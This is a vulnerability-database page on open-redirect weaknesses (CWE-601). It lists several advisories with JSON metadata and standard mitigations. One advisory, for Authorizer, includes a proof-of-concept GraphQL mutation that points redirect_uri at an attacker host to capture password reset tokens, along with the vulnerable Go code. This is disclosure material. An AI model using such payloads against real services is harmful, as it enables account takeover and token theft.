CWE-601
AllowedURL Redirection to Untrusted Site ('Open Redirect')
Abstraction: Base · Status: Draft
The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.
2305 vulnerabilities reference this CWE, most recent first.
GHSA-WXM9-C4V7-5X34
Vulnerability from github – Published: 2026-04-15 18:31 – Updated: 2026-04-15 18:31A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.
This vulnerability is due to improper input validation of HTTP request parameters. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious web page.
{
"affected": [],
"aliases": [
"CVE-2026-20060"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-15T17:17:01Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.\n\nThis vulnerability is due to improper input validation of HTTP request parameters. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious web page.",
"id": "GHSA-wxm9-c4v7-5x34",
"modified": "2026-04-15T18:31:57Z",
"published": "2026-04-15T18:31:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20060"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-unity-vulns-n2EJSbbw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WXV3-WWGP-8547
Vulnerability from github – Published: 2023-11-17 12:30 – Updated: 2023-11-17 12:30An open redirect vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2, allows a remote low privileged user to modify the URL parameter for the purpose of redirecting URL request(s) to a malicious site. This impacts the dashboard area of the user interface. A user would need to be logged into ePO to trigger this vulnerability. To exploit this the attacker must change the HTTP payload post submission, prior to it reaching the ePO server.
{
"affected": [],
"aliases": [
"CVE-2023-5445"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-17T10:15:08Z",
"severity": "MODERATE"
},
"details": "\nAn open redirect vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2, allows a remote low privileged user to modify the URL parameter for the purpose of redirecting URL request(s) to a malicious site. This impacts the dashboard area of the user interface. A user would need to be logged into ePO to trigger this vulnerability. To exploit this the attacker must change the HTTP payload post submission, prior to it reaching the ePO server.\n\n",
"id": "GHSA-wxv3-wwgp-8547",
"modified": "2023-11-17T12:30:18Z",
"published": "2023-11-17T12:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5445"
},
{
"type": "WEB",
"url": "https://kcm.trellix.com/corporate/index?page=content\u0026id=SB10410"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X22R-XGR5-23HH
Vulnerability from github – Published: 2024-10-04 21:31 – Updated: 2024-11-01 18:31URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Microchip TimeProvider 4100 allows XSS Through HTTP Headers.This issue affects TimeProvider 4100: from 1.0.
{
"affected": [],
"aliases": [
"CVE-2024-43683"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-04T20:15:06Z",
"severity": "HIGH"
},
"details": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027) vulnerability in Microchip TimeProvider 4100 allows XSS Through HTTP Headers.This issue affects TimeProvider 4100: from 1.0.",
"id": "GHSA-x22r-xgr5-23hh",
"modified": "2024-11-01T18:31:26Z",
"published": "2024-10-04T21:31:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43683"
},
{
"type": "WEB",
"url": "https://www.gruppotim.it/it/footer/red-team.html"
},
{
"type": "WEB",
"url": "https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities"
},
{
"type": "WEB",
"url": "https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-improper-verification-of-host-header"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:U/V:C/RE:M/U:Amber",
"type": "CVSS_V4"
}
]
}
GHSA-X2PR-G8VF-QFCP
Vulnerability from github – Published: 2026-06-12 18:31 – Updated: 2026-06-12 18:31The Aqara IAM/SSO Gateway (gw-builder.aqara.com) provides an open redirect, which is an instance of "CWE-601: URL Redirection to Untrusted Site," with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (6.1 Medium), which can be used to set up a phishing attack.
{
"affected": [],
"aliases": [
"CVE-2026-50089"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-12T16:16:32Z",
"severity": "MODERATE"
},
"details": "The Aqara IAM/SSO Gateway (gw-builder.aqara.com) provides an open redirect, which is an instance of \"CWE-601: URL Redirection to Untrusted Site,\" with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (6.1 Medium), which can be used to set up a phishing attack.",
"id": "GHSA-x2pr-g8vf-qfcp",
"modified": "2026-06-12T18:31:59Z",
"published": "2026-06-12T18:31:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50089"
},
{
"type": "WEB",
"url": "https://github.com/xn0tsa/theres-no-place-like-home"
},
{
"type": "WEB",
"url": "https://www.runzero.com/advisories/aqara-sso-open-redirect-cve-2026-50089"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X2QF-6HHQ-FFRM
Vulnerability from github – Published: 2022-05-13 01:31 – Updated: 2022-05-13 01:31The NetIQ Identity Manager user console, in versions prior to 4.7, is susceptible to URL redirection.
{
"affected": [],
"aliases": [
"CVE-2018-7674"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-03-28T14:29:00Z",
"severity": "MODERATE"
},
"details": "The NetIQ Identity Manager user console, in versions prior to 4.7, is susceptible to URL redirection.",
"id": "GHSA-x2qf-6hhq-ffrm",
"modified": "2022-05-13T01:31:50Z",
"published": "2022-05-13T01:31:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7674"
},
{
"type": "WEB",
"url": "https://www.netiq.com/documentation/identity-manager-47/releasenotes_idm47/data/releasenotes_idm47.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X2R2-RVHQ-2MQV
Vulnerability from github – Published: 2026-06-10 00:31 – Updated: 2026-06-10 00:31Spring Security's CookieRequestCache and CookieServerRequestCache store the pre-authentication request URL in a browser cookie so that users can be redirected back to their intended destination after a successful login. In affected versions, the full absolute URL is stored in the cookie and is used without validation as the post-login redirect target.
Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5.
{
"affected": [],
"aliases": [
"CVE-2026-41706"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-10T00:16:51Z",
"severity": "MODERATE"
},
"details": "Spring Security\u0027s CookieRequestCache and CookieServerRequestCache store the pre-authentication request URL in a browser cookie so that users can be redirected back to their intended destination after a successful login. In affected versions, the full absolute URL is stored in the cookie and is used without validation as the post-login redirect target.\n\nAffected versions:\nSpring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5.",
"id": "GHSA-x2r2-rvhq-2mqv",
"modified": "2026-06-10T00:31:51Z",
"published": "2026-06-10T00:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41706"
},
{
"type": "WEB",
"url": "https://spring.io/security/cve-2026-41706"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X36X-QFRJ-P4P5
Vulnerability from github – Published: 2025-01-27 21:30 – Updated: 2025-01-28 21:31An issue in Zhiyuan Yuedu (Guangzhou) Literature Information Technology Co., Ltd Shuqi Novel iOS 5.3.8 allows attackers to access sensitive user information via supplying a crafted link.
{
"affected": [],
"aliases": [
"CVE-2024-56971"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-27T19:15:18Z",
"severity": "MODERATE"
},
"details": "An issue in Zhiyuan Yuedu (Guangzhou) Literature Information Technology Co., Ltd Shuqi Novel iOS 5.3.8 allows attackers to access sensitive user information via supplying a crafted link.",
"id": "GHSA-x36x-qfrj-p4p5",
"modified": "2025-01-28T21:31:02Z",
"published": "2025-01-27T21:30:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56971"
},
{
"type": "WEB",
"url": "https://github.com/ZhouZiyi1/Vuls/blob/main/250108-ShuqiNovel/250108-ShuqiNovel.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X37W-7P52-8F49
Vulnerability from github – Published: 2025-12-15 00:30 – Updated: 2026-06-06 00:36A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete."
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "mayan-edms"
},
"ranges": [
{
"events": [
{
"introduced": "4.10.0"
},
{
"fixed": "4.10.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "mayan-edms"
},
"ranges": [
{
"events": [
{
"introduced": "4.9.0"
},
{
"fixed": "4.9.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "mayan-edms"
},
"ranges": [
{
"events": [
{
"introduced": "4.8.0"
},
{
"fixed": "4.8.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "mayan-edms"
},
"ranges": [
{
"events": [
{
"introduced": "4.7.0"
},
{
"fixed": "4.7.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "mayan-edms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-14692"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-16T15:48:24Z",
"nvd_published_at": "2025-12-15T00:15:39Z",
"severity": "LOW"
},
"details": "A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is \"[f]ixed in version 4.10.2\". Furthermore, that \"[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete.\"",
"id": "GHSA-x37w-7p52-8f49",
"modified": "2026-06-06T00:36:22Z",
"published": "2025-12-15T00:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14692"
},
{
"type": "WEB",
"url": "https://docs.mayan-edms.com/chapters/releases/4.10.2.html"
},
{
"type": "WEB",
"url": "https://docs.mayan-edms.com/chapters/releases/4.10.2.html#security"
},
{
"type": "WEB",
"url": "https://github.com/ionutluca888/Mayan-EDMS-OpenRedirect-POC/tree/main"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/mayan-edms/PYSEC-2025-135.yaml"
},
{
"type": "PACKAGE",
"url": "https://gitlab.com/mayan-edms/mayan-edms"
},
{
"type": "WEB",
"url": "https://gitlab.com/mayan-edms/mayan-edms/-/commit/45355cbb45a28f61f38f719112d0ff422e6dc688"
},
{
"type": "WEB",
"url": "https://gitlab.com/mayan-edms/mayan-edms/-/commit/94032fbe553e97b33e4e9b9e731b4fc45f9d9f91"
},
{
"type": "WEB",
"url": "https://gitlab.com/mayan-edms/mayan-edms/-/commit/da9de60a9b84f11d5d2c7bbf118fe696b4f6357e"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.336410"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.336410"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.711729"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Mayan EDMS has an Open Redirect through the /authentication/ file"
}
GHSA-X3F4-V83F-7WP2
Vulnerability from github – Published: 2026-04-06 17:59 – Updated: 2026-04-06 17:59Hi,
I found that 6 endpoints in Authorizer accept a user-controlled redirect_uri and append sensitive tokens to it without validating the URL against AllowedOrigins. The OAuth /app handler validates redirect_uri at http_handlers/app.go:46, but the GraphQL mutations and verify_email handler skip validation entirely. An attacker can steal password reset tokens, magic link tokens, and full auth sessions (access_token + id_token + refresh_token) by pointing redirect_uri to their server. Verified against HEAD (commit 73679fa).
Affected Endpoints
- ForgotPassword (
internal/graphql/forgot_password.go:76-77) - password reset tokens - MagicLinkLogin (
internal/graphql/magic_link_login.go:150-151) - magic link auth tokens - Signup (
internal/graphql/signup.go:211-212) - email verification tokens - InviteMembers (
internal/graphql/invite_members.go:90-91) - invitation tokens - OAuthLoginHandler (
internal/http_handlers/oauth_login.go:18-20) - OAuth redirect stored in state - VerifyEmailHandler (
internal/http_handlers/verify_email.go:27,178) - full auth tokens (access + id + refresh)
Root Cause
Because these 6 endpoints completely lack the validators.IsValidOrigin() check, this vulnerability bypasses secure configurations. Even if a production administrator strictly configures AllowedOrigins to ["https://my-secure-app.com"], an attacker can still steal tokens by passing https://attacker.com to these specific GraphQL mutations. The validation only exists in the /app OAuth handler, not in any of the GraphQL mutations.
In forgot_password.go:76-77, the user-supplied redirect_uri is accepted without validation:
if strings.TrimSpace(refs.StringValue(params.RedirectURI)) != "" {
redirectURI = refs.StringValue(params.RedirectURI)
}
The reset token is appended to this URL at internal/utils/common.go:77:
func GetForgotPasswordURL(token, redirectURI string) string {
verificationURL := redirectURI + "?token=" + token
return verificationURL
}
Compare with the OAuth flow at internal/http_handlers/app.go:46 which validates correctly:
if !validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins) {
c.JSON(400, gin.H{"error": "invalid redirect url"})
return
}
This validation is missing from all 6 endpoints listed above.
Most Severe Path: Full Token Theft via verify_email
After a user clicks the verification link, verify_email.go:178 generates full auth tokens and redirects to the (unvalidated) URL:
params := "access_token=" + authToken.AccessToken.Token +
"&token_type=bearer&expires_in=" + ... +
"&id_token=" + authToken.IDToken.Token + "&nonce=" + nonce
The redirect_uri is stored in the JWT claim from the original request (attacker-controlled). The attacker receives the victim's access_token, id_token, and refresh_token directly.
Because tokens are appended as URL query parameters, they are also automatically leaked to the attacker's server access logs, the victim's browser history, and any third-party analytics scripts on the attacker's page via the Referer header.
PoC
mutation {
forgot_password(params: {
email: "victim@example.com"
redirect_uri: "https://attacker.com/steal"
}) {
message
}
}
The victim receives a legitimate password reset email with the link https://attacker.com/steal?token=<reset_token>. Clicking the link sends the reset token to the attacker.
Impact
- Account takeover via stolen password reset tokens
- Full session theft via stolen access_token + id_token + refresh_token
- Passwordless account compromise via stolen magic link tokens
- No authentication required to trigger (the GraphQL mutations are public)
- Victim only needs to click the email link from their trusted Authorizer instance
Additional Note
The default AllowedOrigins at cmd/root.go:39 is ["*"], so even the OAuth endpoint's validation is a no-op by default. Recommend changing the default to require explicit configuration.
Koda Reef
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/authorizerdev/authorizer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260329085140-6d9bef1aaba3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-06T17:59:27Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Hi,\n\nI found that 6 endpoints in Authorizer accept a user-controlled `redirect_uri` and append sensitive tokens to it without validating the URL against `AllowedOrigins`. The OAuth `/app` handler validates redirect_uri at `http_handlers/app.go:46`, but the GraphQL mutations and verify_email handler skip validation entirely. An attacker can steal password reset tokens, magic link tokens, and full auth sessions (access_token + id_token + refresh_token) by pointing redirect_uri to their server. Verified against HEAD (commit 73679fa).\n\n## Affected Endpoints\n\n1. **ForgotPassword** (`internal/graphql/forgot_password.go:76-77`) - password reset tokens\n2. **MagicLinkLogin** (`internal/graphql/magic_link_login.go:150-151`) - magic link auth tokens\n3. **Signup** (`internal/graphql/signup.go:211-212`) - email verification tokens\n4. **InviteMembers** (`internal/graphql/invite_members.go:90-91`) - invitation tokens\n5. **OAuthLoginHandler** (`internal/http_handlers/oauth_login.go:18-20`) - OAuth redirect stored in state\n6. **VerifyEmailHandler** (`internal/http_handlers/verify_email.go:27,178`) - full auth tokens (access + id + refresh)\n\n## Root Cause\n\nBecause these 6 endpoints completely lack the `validators.IsValidOrigin()` check, this vulnerability bypasses secure configurations. Even if a production administrator strictly configures `AllowedOrigins` to `[\"https://my-secure-app.com\"]`, an attacker can still steal tokens by passing `https://attacker.com` to these specific GraphQL mutations. The validation only exists in the `/app` OAuth handler, not in any of the GraphQL mutations.\n\nIn `forgot_password.go:76-77`, the user-supplied `redirect_uri` is accepted without validation:\n\n if strings.TrimSpace(refs.StringValue(params.RedirectURI)) != \"\" {\n redirectURI = refs.StringValue(params.RedirectURI)\n }\n\nThe reset token is appended to this URL at `internal/utils/common.go:77`:\n\n func GetForgotPasswordURL(token, redirectURI string) string {\n verificationURL := redirectURI + \"?token=\" + token\n return verificationURL\n }\n\nCompare with the OAuth flow at `internal/http_handlers/app.go:46` which validates correctly:\n\n if !validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins) {\n c.JSON(400, gin.H{\"error\": \"invalid redirect url\"})\n return\n }\n\nThis validation is missing from all 6 endpoints listed above.\n\n## Most Severe Path: Full Token Theft via verify_email\n\nAfter a user clicks the verification link, `verify_email.go:178` generates full auth tokens and redirects to the (unvalidated) URL:\n\n params := \"access_token=\" + authToken.AccessToken.Token +\n \"\u0026token_type=bearer\u0026expires_in=\" + ... +\n \"\u0026id_token=\" + authToken.IDToken.Token + \"\u0026nonce=\" + nonce\n\nThe redirect_uri is stored in the JWT claim from the original request (attacker-controlled). The attacker receives the victim\u0027s access_token, id_token, and refresh_token directly.\n\nBecause tokens are appended as URL query parameters, they are also automatically leaked to the attacker\u0027s server access logs, the victim\u0027s browser history, and any third-party analytics scripts on the attacker\u0027s page via the `Referer` header.\n\n## PoC\n\n mutation {\n forgot_password(params: {\n email: \"victim@example.com\"\n redirect_uri: \"https://attacker.com/steal\"\n }) {\n message\n }\n }\n\nThe victim receives a legitimate password reset email with the link `https://attacker.com/steal?token=\u003creset_token\u003e`. Clicking the link sends the reset token to the attacker.\n\n## Impact\n\n- Account takeover via stolen password reset tokens\n- Full session theft via stolen access_token + id_token + refresh_token\n- Passwordless account compromise via stolen magic link tokens\n- No authentication required to trigger (the GraphQL mutations are public)\n- Victim only needs to click the email link from their trusted Authorizer instance\n\n## Additional Note\n\nThe default `AllowedOrigins` at `cmd/root.go:39` is `[\"*\"]`, so even the OAuth endpoint\u0027s validation is a no-op by default. Recommend changing the default to require explicit configuration.\n\nKoda Reef",
"id": "GHSA-x3f4-v83f-7wp2",
"modified": "2026-04-06T17:59:27Z",
"published": "2026-04-06T17:59:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/authorizerdev/authorizer/security/advisories/GHSA-x3f4-v83f-7wp2"
},
{
"type": "WEB",
"url": "https://github.com/authorizerdev/authorizer/pull/502"
},
{
"type": "WEB",
"url": "https://github.com/authorizerdev/authorizer/commit/6d9bef1aaba3f867f8c769b93eb7fc80e4e7b0a2"
},
{
"type": "PACKAGE",
"url": "https://github.com/authorizerdev/authorizer"
},
{
"type": "WEB",
"url": "https://github.com/authorizerdev/authorizer/releases/tag/2.0.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Authorizer: Password reset token theft and full auth token redirect via unvalidated redirect_uri"
}
GHSA-X3FJ-P9WP-C8F5
Vulnerability from github – Published: 2022-05-24 16:56 – Updated: 2024-04-04 01:56Open redirect vulnerability in Cybozu Garoon 4.0.0 to 4.10.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the application 'Scheduler'.
{
"affected": [],
"aliases": [
"CVE-2019-5978"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-09-12T17:15:00Z",
"severity": "MODERATE"
},
"details": "Open redirect vulnerability in Cybozu Garoon 4.0.0 to 4.10.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the application \u0027Scheduler\u0027.",
"id": "GHSA-x3fj-p9wp-c8f5",
"modified": "2024-04-04T01:56:06Z",
"published": "2022-05-24T16:56:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5978"
},
{
"type": "WEB",
"url": "https://kb.cybozu.support/article/35916"
},
{
"type": "WEB",
"url": "http://jvn.jp/en/jp/JVN62618482/index.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- Use a list of approved URLs or domains to be used for redirection.
Mitigation
Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page.
Mitigation MIT-21.2
Strategy: Enforcement by Conversion
- When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
- For example, ID 1 could map to "/login.asp" and ID 2 could map to "http://www.example.com/". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Mitigation
Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330).
Mitigation MIT-6
Strategy: Attack Surface Reduction
- Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
- Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-178: Cross-Site Flashing
An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.